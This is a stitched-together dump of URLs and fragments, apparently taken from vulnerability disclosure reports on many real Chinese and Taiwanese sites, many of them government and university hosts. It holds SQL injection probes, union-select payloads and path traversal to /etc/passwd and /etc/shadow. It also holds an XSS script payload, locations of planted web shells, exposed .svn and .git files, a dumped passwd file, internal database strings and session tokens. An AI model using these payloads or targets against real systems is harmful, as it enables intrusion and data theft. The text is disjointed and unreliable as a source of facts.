http://153.0.40.35/web_shell_cmd.gch http://153.0.70.63/web_shell_cmd.gch http://153.0.69.248/web_shell_cmd.gch http://58.215.50.44/FDA-PortEnt/PortEntLogin.html http://www.ccsa.org.cn/tc/index.php?tcid= http://xyb.cupl.edu.cn/AlumniL_LunTanPostM.aspx?fid=19 http://jx.17qibu.cn/login.html http://upload.yohobuy.com/.svn/entries http://wooyun.org/bugs/wooyun-2010-094365 http://www.hejia.cn/WebContent/NewPortal/Product/ProductSummary.aspx?newsType=109 http://houqin.sdkd.net.cn/news_ny.php?id=3008%20and%201=2 http://houqin.sdkd.net.cn/oa/login.php http://houqin.sdkd.net.cn/admin/oa/login.php http://www.hlbe.gov.cn http://www.517bx.com/index.php?a=search&featureId=1&m=product&typeId=0 http://www.wacai.com http://www.wacai.com/clientAppDownload.action filetype:action www.wacai365.net/finance/webmarket/recommend.action www.wacai.com www.wacai365.net www.wacai365.net http://www.wacai365.net/finance/webmarket/fundwebdetail.action?fundCode=202301 http://www.wacai.com/finance/webmarket/fundwebdetail.action?fundCode=202301 http://www.wacai365.net/finance/webmarket/635394720705098857.txt http://www.wacai.com/lulula.htm http://computer.upc.edu.cn/%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8E%E9%80%9A%E4%BF%A1%E5%B7%A5%E7%A8%8B%E5%AD%A6%E9%99%A2.rar http://zgws.xinhuanet.com/ http://www.zhongguowangshi.com http://www.zhongguowangshi.com/search.aspx?keyword=&typeid=201 site:moxiu.net http://moxiu.net/mxadminv3/index.php?do=Login http://chi.gogoblog.tw/index_t.php?ptype=ad&id=369 http://125.35.24.219/admin/tripDataFront/TripSearchAction_findDataCountToTrip.action http://202.108.65.163/login!navigator.jhtml http://www.cnoocengineering.com/ship01.aspx?column_id=10411&news_id=11803 http://218.106.133.143/sigma/Admin/Upload.asp http://www.gfxww.com/WebPage/Static/NewsView.aspx http://itha.nmciq.gov.cn/ http://itha.nmciq.gov.cn/include/showtcinfo.asp?tid= magazine.tcl.com/en/a.aspx root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://ugame.admin.ucdns.uc.cn/ www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 http://101.95.49.56:8080/EHotel/ jdbc:oracle:thin:@172.16.51.97:1521:jdet http://www.517na.com/Login/AccountsDetail.aspx?id=104 http://58.22.102.45/resin-doc/viewfile/?file=/doc/install.xtp http://58.22.102.45/resin-doc/viewfile/?file=index.jsp http://new.hbqj.gov.cn/config/config_global.php.bak http://kszx.jlu.edu.cn/admin/phpMyAdmin3431/ site:blog.zzedu.net.cn http://www.intelcbi.com/logon.php https://github.com/skybjf/ManageHotel/blob/2b46c0490a9795455be72cec31fe1da88b871584/WebRoot/WEB-INF/classes/hotel-config.properties jdbc:mysql://192.168.0.33:3306/weibo_climb?useUnicode=true&characterEncoding=utf8&characterSetResults=utf8&autoReconnect=true https://github.com/isme-jac/wl_product/blob/7119ea9d751e0fcba09c13adf08c822ba2c8a5c6/core/mail.php http://store.tdxinfo.com/tops-front-purchaser/facade/signin的登陆口用burp抓包 http://store.tdxinfo.com http://chem.nju.edu.cn:90/jlmc/photo/shit.asp http://sy.ifeng.com/member/login http://scm.hisense-plaza.com/scmsup/ http://dlhaier.com/ http://dlhaier.com/admin/login.asp http://218.28.234.62:8080/20150404020442.asp;.txt http://jwl.us.woniu.com/ http://www.hzlib.net/ http://www.jiemo.net/library/Home/index.php/School/show/id/3.html http://mobile.datanggroup.cn/Search.aspx?KeyWords=abc http://mobile.datanggroup.cn/Search.aspx?KeyWords=abc http://sqlmap.org http://115.28.35.81/home!resource.action http://support1.lenovo.com.cn/lenovo/wsi/modules/manage/getminfobysn.ashx?sn=e http://zhongyi.ifeng.com/login.html这个接口 URL:http://login.2345.com/find/checkCode http://login.2345.com/find/step4?forward=&from=phone&code=******直接进入重置密码环节。 http://www.w3.org/1999/xhtml http://www.bjcs.edu.cn/cn/index.php/Info/content/boardid/200/detail/204/contentid/1962 www.bilibili.com http://f.dangdang.com www.aizai.com http://game.g.pptv.com/guest/c/sq/api.php?action=logout http://user.g.pptv.com/login/cms/?gid=dgwm http://www.btghj.com.cn/ghj/cn/yggh_show.asp?newsid=755 http://www.fruitday.com http://007.maxthon.cn/login.php?ac= http://wooyun.org/bugs/wooyun-2015-095638/trace/2e0247bec4eb612930800968d5426f13 http://www.007.mx/fyws/ www.sfn.cn及 https://www.shodan.io/search?query=JDWP-HANDSHAKE https://github.com/IOActive/jdwp-shellifier http://service.eesc.com.cn/login/getAllexam.do?type=%B3%C9%C8%CB%B8%DF%BF%BC&servicename=%B3%C9%BC%A8%B2%E9%D1%AF(type参数和servicename参数都存在注入) http://service.eesc.com.cn/spot/spotMenu.do?type=toSelect&examTypeID=388(examTypeID) http://scrcu.21tb.com/els/html/course/course.courseInfo.do?courseId=PTC020104_scrcu&p= http://scrcu.21tb.com/els/html/course/course.fetchUserByStepRateJson.do?courseId=PTC020104_scrcu&type=WAIT&page.pageNo=1&page.pageSize=9¤t_app_id=&_= http://scrcu.21tb.com/cm/html/statistics/certStatistics.userList.do?current_app_id=&userName=&organizeId=&page.pageNo=25850&page.pageSize=1 http://scrcu.21tb.com/els/html/index.parser.do?id=0003 http://scrcu.21tb.com/bol/html/index.parser.do http://www.fqac.org/admin/ http://www.fqac.org/upload/admin/ http://60.172.210.251:7001//defaultroot/information_manager/informationmanager_upload.jsp http://10.6.125.45:8080/boardroom/index.jsp http://10.5.15.149:17173/Default.aspx http://oa.local.17173.com/ http://zhidao.local.17173.com/ http://reward.local.17173.com/ http://10.5.117.200/svn/enterprise/docs/ermp/设计文档/原型设计/角色与权限原型 http://10.5.117.200/svn/enterprise/docs/ermp/需求文档/产品需求规格说明书-企业信息化项目_基础模块(角色与权限).doc http://ermp.local.17173.com svn://**.**.**/MLDJClient/Version/Main/Project/Public/OperationMaintenance_ http://account.zuzuche.com/user/forgetpwd.php http://61.129.250.80/workorder-web/wod/onlineCompla/popupSkip.html?workorderId=99400&Rnd=0.1187884917751818 http://61.129.250.80/workorder-web/wod/onlineCompla/loadWorkOrder.html?workorderId=99401 http://61.129.250.80/workorder-web/wod/onlineCompla/popupSkip.html?workorderId=596187&Rnd=0.1187884917751818 http://mail.shxca.gov.cn/webmail/index.php?domain=shxca.gov.cn http://211.100.23.134/webmail/index.php?domain=tonghuimuju.com也是domain可以注入 http://rma.zte.com.cn/user/loginPage.html http://www.77.com.tw/admin/FCKeditor/editor/fckeditor.html www.77.com.tw\wuyun.txt http://www.cadeau.com.tw/wuyun.txt http://www.test.rivon.com.tw/wuyun.txt http://x.x.x.x:3333/shell.txt http://www.cast.gov.cn/public/china/?action=show&template=default&%20ClassId=18&producetid=2987 android:configChanges="keyboardHidden|orientation android:name="cn.jpush.android.ui.PushActivity android:theme="@android:style/Theme.Translucent.NoTitleBar android:name="cn.jpush.android.ui.PushActivity"/ android:name="android.intent.category.DEFAULT"/ android:name="com.sf.activity"/ http://shop.ali213.com/pay_go.php?id=1118 http://shop.ali213.com/pay_go.php?id=1118 http://vote.sports.tom.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://180.140.191.150:100 http://www.zxxs.unimip.cn/ocean/login.action http://www.takee.com.cn/product/?id=45 http://www.jnfdc.gov.cn/ http://www.jnfdc.gov.cn/install/install_params.jsp http://skleh.cams.ac.cn/show.php?contentid=557 http://tyjs.jsinfo.gov.cn/IOSI/backgroundServlet?method=toUserLogin inurl:hcnewlist2.aspx http://221.2.171.59:8000/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100//hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://222.135.76.147:8100/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://218.56.40.229:8000/hcnewlist2.aspxid=220&newsid=1260&deptid=51 http://123.134.189.60/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://60.217.72.17:8073/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://i.nbdhyu.edu.cn/dcp/FileDownLoadloadServlet?module=storage&sName=fileDownload&upload_path=storage-path&folder_id=1837&downloadname=1423103413691.jsp&resource_id=2965 http://i.nbdhyu.edu.cn/dcp/upload_files/storage/1423103413691.jsp http://x.edu.cn/dcp/forward.action?path=/portal/portal&p=personalHomePage&user_id=amcxMDMxMzk= http://i.nbdhyu.edu.cn/dcp/FileDownLoadloadServlet?module=storage&sName=fileDownload&upload_path=storage-path&folder_id=1837&downloadname=1423103370399.jpg&resource_id=2964 http://i.nbdhyu.edu.cn/dcp/portal/gVarInit.jsp?p=wkHomePage&gId=null&user_id=null http://mpb.csu.edu.cn:811/fmen/usermgr/userAction!login.action http://mpb.csu.edu.cn:811/fmen/testcc.jsp http://112.124.34.223:8888/fwpt/login/loginAction!validateUser.action http://www.elanw.com/program/showadmin/showDetails.php?id=600 inurl:erjilist.aspx?id= http://60.217.72.17:8073/erjilist.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/erjilist.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/erjilist.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100//erjilist.aspx?id=220&newsid=1260&deptid=51 http://222.135.76.147:8100/erjilist.aspx?id=220&newsid=1260&deptid=51 http://218.56.40.229:8000/erjilist.aspx?id=220&newsid=1260&deptid=51 http://123.134.189.60/erjilist.aspx?id=220&newsid=1260&deptid=51 http://my.55bbs.com/blog-4191686-317613-1.html http://www.seed.org.tw/ http://www.seed.org.tw/fckeditor/editor/dialog/fck_about.html http://www.seed.org.tw/fckeditor/editor/filemanager/upload/test.html http://*****.sinaapp.com/?u=0e55bf http://www.ab95569.com/user/myorderId.htm?orderId=20150204173203529571955&productType=8 http://rtb.bitsmart.com.cn/account.php?method=editAccount&id=81%20and%202=3%20union%20select%201,user%28%29,version%28%29,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20 http://**.**.**/symptom/medicinalsymptom_id=4481&scope=&reagent=2&brand=&cared=&otc= http://tieba.baidu.com/i/280830037 http://baike.baidu.com/ http://zhidao.baidu.com/ http://hi.baidu.com/%B3%A4%C9%B3%D3%D0%B5%C0%CD%D8%D5%B9/iho http://my.58.com/ http://www.baixing.com/fabu/?src=zhuce&city=changsha http://webmail.mail.163.com/js4/main.jsp?sid=VBKGUupwgOjpNINCCywwodOcF http://blog.sina.com.cn/u/2789274714 http://i.youku.com/u/home/ http://www.tudou.com/my/setting/regInterest.action http://www.ceconlinebbs.com/gl/%B0%A2%C0%EF%B0%CD%B0%CD%B9%AB http://www.08px.com/User/OInfoEdit.aspx http://www.51tie.com/member/index.php?SystemId=2&main=post_company.php http://www.douban.com/ http://cs.pxto.com.cn/User/main.asp http://www.csnis.com/ http://member.nowec.com/ http://www.denghuo.com/Reg_submit.asp http://admin.ev123.com/index.php http://users.net114.com/member_new/info.html http://www.qy6.com/myqy6/index.php http://changsha.liebiao.com/ http://www.417628.org/bbs/u.php?verify=651f121d http://cs.ganji.com/?ca_name=hao360_hao360_011_quanguoshouye http://www.365zhaosheng.com/user/index.asp?UName=csyoudao http://www.0731koubei.com/ http://baike.soso.com/(只能创建词条,而且写不了几个字) http://member.100ye.com/manage/manage.asp http://blog.sohu.com/ http://blog.163.com/csyoudao/manage/?from=newreg&entry=blog#m=0&t=0 http://ie.sogou.com/skins/?route=ucenter/signup/signupsuc&uid=nKfcoNiYk6KiaJeX http://my.tianya.cn/69987008#app=mobile_cellphone&action=smsopen http://user.qzone.qq.com/2473914322/infocenter http://www.szpxe.com/service/view/54507 www.3bbs.net http://reg.rednet.cn/member.asp http://dzh.mop.com/#/2010/right.jsp http://my.tianya.cn/ http://bbs.voc.com.cn/ http://www.xici.net/ http://bbs.hxoutdoor.com/ http://hiker.xout.cn/forumdisplay.php?fid=1547 http://bbs.hn87.com/ http://i.yinyuetai.com/i/8982483/blog/detail/809858 http://www.yigou100.cn/shop/display.action http://im.sina.com.cn/report.php?type=1&uid=1&retcode=0 http://61.153.210.85/ http://111.13.88.85:8090/login.htm www.igexin.com)推送系统【个信属新浪旗下产品】 http://waimai.baidu.com/trade/getpindanprice pindan_id:13219417460720277061_f725b2800ec89bba383e21d66492d3b38fca02fc_1423121999203 bdstoken:adf385c9d97f04040daf9df2e872232d display:json http://zhanzhang.baidu.com/robots/checkrule http://sxjy.sx.sgcc.com.cn/ http://www.rc168.com/OwenMange/PersonResume1.aspx?user=oscarliu1991 http://action.tenpay.com/wxts/ptrp.shtml?total_fee= http://action.tenpay.com/wxts/ptrp.shtml?total_fee=100000000000000000000000000&pay_uin= http://wap.fruitday.com/.git/config http://wooyun.org/bugs/wooyun-2014-076372 http://nsrs.swu.edu.cn/szyx/szyx/liberty/msgmanage.do?action=show_msg&id=1408932887660 http://rumor.nownews.com/rumor/rumor.php?eid=3072 http://rumor.nownews.com/informer/informer.php?mid=1575014 http://wenews.nownews.com/reporter_profile.php?mid=1550093 http://wenews.nownews.com/category.php?kid=1&sort=2 http://wenews.nownews.com/search_result.php?tid=765 http://tv.lenovo.com.cn/index.php?a=index&m=search http://tv.lenovo.com.cn/i.php http://tv.lenovo.com.cn/info.php app.staff.xdf.cn/admin/ http://app.staff.xdf.cn/data/uploads/2014/0825/16/53faf2443c0b8.php http://bx.hiad365.com/logout.action http://125.88.10.230:8080/jmx-console/ http://v.17173.com/u/114642817/videos/?state=pass&order=time&keywords=140801 http://wooyun.org/bugs/wooyun-2010-089653 http://app.wanda.cn/todo/test/addCheckUpdate.jsp inurl:hcnewlist2.aspx http://221.2.171.59:8000/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100//jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.76.147:8100/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://218.56.40.229:8000/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://123.134.189.60/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://60.217.72.17:8073/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://101.226.16.23 http://sytxmz.gov.cn/sytxmz/showmzdt.asp?id=1852 http://bcs.duapp.com/ehevaeaa/6.0.0.8037/VASetup_6.0.1.8037.exe http://bcs.duapp.com/ehevaeaa/6.0.0.8037/EAA_Setup_6.0.1.8037.exe http://218.9.185.207:8080/zhglpt/gkxx/xmgkxx/listXmgkxx.action inurl:wdviewimg.aspx?deptid= http://221.2.171.59:8000/wdviewimg.aspx?deptid=&id=267 http://222.135.109.70:8100/wdviewimg.aspx?deptid=&id=267 http://61.133.119.187:8089/wdviewimg.aspx?deptid=&id=267 http://221.2.149.47:8100//wdviewimg.aspx?deptid=&id=267 http://222.135.76.147:8100/wdviewimg.aspx?deptid=&id=267 http://218.56.40.229:8000/wdviewimg.aspx?deptid=&id=267 http://123.134.189.60/wdviewimg.aspx?deptid=&id=267 http://60.217.72.17:8073/wdviewimg.aspx?deptid=&id=267 http://www.whyouth.gov.cn/site/webback/Login.action shell:http://www.whyouth.gov.cn/site/1.jsp http://huodong.women.sohu.com/yigong/?type=1 http://mall.sina.com.cn http://www.aqjyw.gov.cn/include/content.php?id=552 http://112.94.224.247:8080/openimap/iportal/iportalIndex.action http://e.tcl.com.cn/ http://www.xnyy.cn/XNYYFore/Search_list.aspx?T=医疗咨询&K=12 https://61.144.226.121/por/login_psw.csp http://ebidding.lenovo.com.cn/backoffice/main1.aspx?type=back http://ebidding.lenovo.com.cn/Default.aspx http://ebidding.lenovo.com.cn/backoffice/ http://ebidding.lenovo.com.cn/backoffice/main.aspx要先登录第一个再来访问这个地址才行 http://i.jcloud.com/account http://batchhelper.sinaapp.com/ http://apps.weibo.com/guanjia http://app.weibo.com/detail/62A7lB?ref=appsearch http://app.weibo.com/detail/411VYf?ref=appsearch http://app.weibo.com/detail/3MnIiu?ref=appsearch http://app.weibo.com/detail/1iA37I?ref=appsearch http://app.weibo.com/detail/62A7lB?ref=appsearch http://app.weibo.com/detail/411VYf?ref=appsearch ttp://t.cn/Rhdd4Zp http://mall.sina.com.cn使用了同样架构 http://jifen.sina.com.cn http://ask.sdo.com/userinfo/myarticle?gameno=4 http://www.ztehotel.com/mobile/mLogin.aspx www.ztehotel.com http://op.cig.com.cn/ http://op.dma.cig.com.cn/op/lms/stat/xsts_info?id=0&aname=&success_push=3&failure_push=0&buxuyao_push=0&volume_push=0 http://op.dma.cig.com.cn/op/lms/stat/cfxs_info/?clue_id=82705 http://op.cig.com.cn/运行平台的信息 http://113.31.28.21:8002/ http://61.156.23.202:8080/ http://wooyun.org/bugs/wooyun-2015-094658 http://www.peiwo.cn/ https://api.peiwoapi.comaccount/forgetpassword?app=1&captcha=6位验证码&password=MD5加密密码&phone=手机号&version=151 http://www2.pccu.edu.tw/CRB/FckEditor/ http://esports.games.ifeng.com/lushi/search http://www.jzhbj.gov.cn/viewmessage1.aspx?leo=1&id=2221 http://file.y.sdo.com/ifile/wap.do?s=00058CF3C3443CA9BBAD32C7AAB6AC3D&r=DA62B885371E293827721F2FE94D3570&uuid=9261f6a7b9be44718ec625d1c9480e60.jpg http://klasqc.physics.sjtu.edu.cn/DetailInfo.php?id=78&num=22 http://shixi.189.cn/shixibao/ http://shixi.189.cn/shixibao/cp.php?ac=zhiwei_result_detail&ignore=1&jobid=15261 http://www.zyaic.gov.cn/include/Viewer/Viewer.php?aid=1 http://erp.fang.com/WebMain.aspx?aid=118 http://zdys.zju.edu.cn/news_info.php?id=960&classid=177 http://www.douguo.com/mall/item/401 http://www.douguo.com/mall/item/184 http://ritu.cn/image/16814/lpt5.1.asp http://www.julaibao.com/web/login.aspx www.hua.com http://play.ifeng.com/?_c=puke&_a=login这个接口,属于凤凰游戏吧应该,是个德州扑克的登陆接口,无任何登陆限制 http://116.252.221.148:9001/SSQ/BrowseTestImage.aspx?testImageCode=11111111111431045001000301&studentCode=140123&imageCount=2&CouseText=%E8%AF%AD%E6%96%87&ClassName=%E9%AB%98%E4%B8%8014%E7%8F%AD http://sqlmap.org http://www.steelhome.cn/MemberLogin.php?urlstr=http://news.steelhome.cn/2004/08/24/n10160.html http://www.steelhome.cn/MessageShow.php?nid=10160 http://www.wzswsj.gov.cn/AdminCP/sbb_content.jsp?key=10 http://www.meitrip.cn http://www.meitrip.cn/private/GetGardenRoom.aspx?Hid=110602 http://www.tycts.com/LineList.aspx?title=2015 http://www.tycts.com/LineList.aspx?title=2015%27 http://www.tycts.com/LineList.aspx?title=2015%2527 http://927953.com/cn/bulletins/bulletinlist.aspx?id=834 http://sjj.ahhs.gov.cn/ www.norming.com.cn,看了系统开发商介绍,ESS与PSA好像是核心业务 http://act.dn.sdo.com/Honour/Handler/Handler.ashx?guid=172f4321-a5b1-4744-a077-2d3b8ccd46e3 http://act.xcb.sdo.com/project/singing/index.asp?page=1&modarea=1&modserver=1 http://baoku.baidu.com/search.php?word=test\x3c/title\x3e\x3cscript\x3ealert\x28\x27XSSSSS\x27\x29\x3c/script\x3e\x3ctitle\x3e http://www.whiterock.cn/web/GetPWD/GetPassword_1.aspx http://www.whiterock.cn/web/logout.aspx?ReturnUrl=http://www.whiterock.cn/_d14.htm http://www.whiterock.cn/web/logout.aspx?ReturnUrl=http://www.wooyun.org http://vip.fescoshanghai.com/benefit/sysarticle.aspx?arcid=132 http://magic.camera360.com/phpinfo.php http://share.camera360.com/phpinfo.php https://abroad.movie.camera360.com/phpinfo.php https://android.camera360.com/phpinfo.php https://geography.camera360.com/phpinfo.php https://hellocamera.camera360.com/phpinfo.php https://iphone.camera360.com/phpinfo.php https://magic.camera360.com/phpinfo.php https://mix.camera360.com/phpinfo.php https://movie.camera360.com/phpinfo.php https://pull.camera360.com/phpinfo.php https://sdk.camera360.com/phpinfo.php https://share.camera360.com/phpinfo.php https://suggest.camera360.com/phpinfo.php https://theme.camera360.com/phpinfo.php https://wp.camera360.com/phpinfo.php https://xiuse.camera360.com/phpinfo.php http://magic.camera360.com:6002/phpinfo.php http://pull.camera360.com:6002/phpinfo.php http://share.camera360.com:6002/phpinfo.php http://store.camera360.com:6002/phpinfo.php http://theme.camera360.com:6002/phpinfo.php http://www.5067.cc/,而且挂了很多个。 http://pharmyyouth.xmu.edu.cn/ http://123.135.104.38:90查询成绩的提问,感兴趣地点了一下问题相关,发现有人发布了一个弱口令(666666),简单测试了弱口令用户名123,以用户身份成功登入网上阅卷系统。 http://210.41.225.115:8888/cdzk/ http://210.41.225.115:8888/cdzk/project_content.jsp?project_id=201406124695 http://**.**.** http://wbm.whu.edu.cn/old/jcnr.php?mid=1&sid=33&id=1697%20and%201=2&tag=0 http://www.czrc.com.cn/wlzpjxh/WGR25.php?id=1698 http://www.189hao.cn/ http://www.189hao.cn/protected/ http://www.189hao.cn/game/ http://www.189hao.cn/test.php https://cms.camera360.com https://oa.camera360.com https://salt.camera360.com http://www.mylygport.com/qiehuan_ser.aspx http://www.mylygport.com/qiehuan_ser.aspx http://cert.tanet.edu.tw/prog/secrpt.php inurl:ShowBusinessList.aspx?ctype== http://221.2.171.59:8300/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://60.2.214.118:8088/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://121.17.2.52/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://rctdlz.cn/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://61.186.154.210:8088/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://www.sinobook.com.cn/forum/forum.cfm?iBookNo=691251 http://uem.3songshu.com/admin/good/good_sel.aspx?id=1161 http://222.66.48.92 http://222.66.48.92/loginAction.do http://xy.zhanchenggame.com//index.php?c=ajaxproxy&url=../../../../../../../../../../etc/passwd inurl:ShowProductList.aspx?ctype= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://60.2.214.118:8088/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://121.17.2.52/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://rctdlz.cn/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://61.186.154.210:8088/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://www.mylygport.com/admin.aspx http://www.mylygport.com/news_edit_dj.aspx http://www.mylygport.com/admin_imgnews.aspx http://www.mylygport.com/admin_lz_movie.aspx http://www.mylygport.com/admin_kxmovie.aspx http://www.mylygport.com/admin_xxh_gj.aspx http://www.mylygport.com/rwzf_xxh.aspx http://www.mylygport.com/rwzf_xxh_add.aspx http://www.mylygport.com/admin_mobile.aspx http://www.mylygport.com/admin_xt_yh.aspx http://www.mylygport.com/xm_message_edit.aspx http://222.204.208.4/ http://dxsb.qfnu.edu.cn http://182.129.150.10:8001 http://202.206.48.106 http://labch.cumt.edu.cn:81 http://dxsb.qfnu.edu.cn http://zz.sdlgzy.com http://hywl.nbu.edu.cn http://static.camera360.com/web/.svn/entries http://www.strongsoft.net/ pss.uestc.edu.cn/tasi/admin/authorize/authorize.asp?action=querylist http://old.makerlm.com/data/DatabaseBackup/ http://old.makerlm.com/public/ http://my.lotour.com/i//Goods/OrderLineDetail?orderid=53121 http://my.lotour.com/i//Goods/OrderLineDetail?orderid=13222 http://ganzizangzu.lotour.com/zj/1110702 http://my.lotour.com/mall/XiangQing.aspx?proid=220 inurl:homeLogin.action inurl:xxsearch.action http://ykt.wh.sdu.edu.cn/xykcx/managerNManager.action http://ecard.jxust.cn/managerNManager.action http://yktcx.njmu.edu.cn/managerNManager.action http://ecard.utsz.edu.cn/managerNManager.action http://ecard.ctbu.edu.cn/managerNManager.action http://www.fat.com.tw/index/index.aspx http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab http://125.88.10.238/login.aspx http://news.baidu.com/jump.html?_xuid=http://xxx.com http://61.144.78.156/kks/kks_main.nsf?Opendatabase http://www.jys.gov.cn/more.php?p=0&c=109016 http://www.jys.gov.cn/videoMore.php?p=0&c=109003 http://www.jys.gov.cn/video.php?c=109003&i=248251a http://www.jys.gov.cn/hfrx.php?c=109006&i=245224a http://www.jiangyan.gov.cn/interface/jy_bbs_list.php?obj=ad_h2&c=5&n=3&t=46&tid=2 gov.cn/detail.php?c= gov.cn/detail_zt.php?c= http://www.jys.gov.cn/detail.php?c=101002&i=248464 http://huagang.gov.cn/detail.php?c=101203&i=205139 http://jsjygsj.gov.cn/detail.php?c=101004&i=246715 http://www.jsjyxzsp.gov.cn/detail.php?c=201811&i=49626 http://jykfq.gov.cn/detail.php?c=301631&i=210108 http://jysf.gov.cn/detail.php?c=222903&i=242453 http://www.jyjtj.gov.cn/detail.php?c=201701&i=231307 http://www.jsjyhrss.gov.cn/detail.php?c=101004&i=246591 http://www.jysagr.gov.cn/detail.php?c=101102&i=34411 http://www.jyhb.jiangyan.gov.cn/detail.php?c=211023&i=244371 http://jyws.gov.cn/detail.php?c=212001&i=220976 http://www.jydx.org.cn/detail.php?c=101101&i=49881 http://jslxz.cn/detail.php?c=201958&i=205507 http://www.jsjy.agri.gov.cn/detail.php?c=201904&i=222360 www.autob.cn会转到www.zoub.cn。 http://www.zoub.cn/index.php?r=users/Renewpass/email/MTYwNDA3OTM5OUBxcS*****= http://www.zoub.cn/index.php?r=users/Renewpass/email/c2VydmljZUBhdXRvYi5jbg== http://bbs.aliyun.com/read/227818.html?spm=5176.383338.3.4.7sY9qC http://app10.sznews.com/admin/login http://www.tna.com.tw/about/8_5_3.aspx?id=195 inurl:WebDefault3.aspx?CountryName= http://222.134.154.214:8001/WebDefault3.aspx?CountryName=南麻镇&level=2 http://123.134.189.60:8013/WebDefault3.aspx?CountryName=雪野旅游区&level=0 http://218.58.124.131:8003/WebDefault3.aspx?CountryName=高新区&level=1 http://221.2.149.47:8200/WebDefault3.aspx?CountryName=荫子镇&level=2 http://jwh.tanljgzx.gov.cn/WebDefault3.aspx?CountryName=泰安市&level=0 http://61.133.119.187:8091/WebDefault3.aspx?CountryName=高技区&level=1 http://218.56.99.84:8003/WebDefault3.aspx?CountryName=昆仑镇&level=2 http://111.17.169.213:801/WebDefault3.aspx?CountryName=张店区&level=0 http://sn.whut.edu.cn/Admin/LoginAdmin.aspx http://pub2.whut.edu.cn/icea/civilsite/shownews.asp?articleid=5506%20and%201=1 http://pms.cig.com.cn/ http://wss.cig.com.cn/ http://www.fruitday.com inurl:sllistout.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba 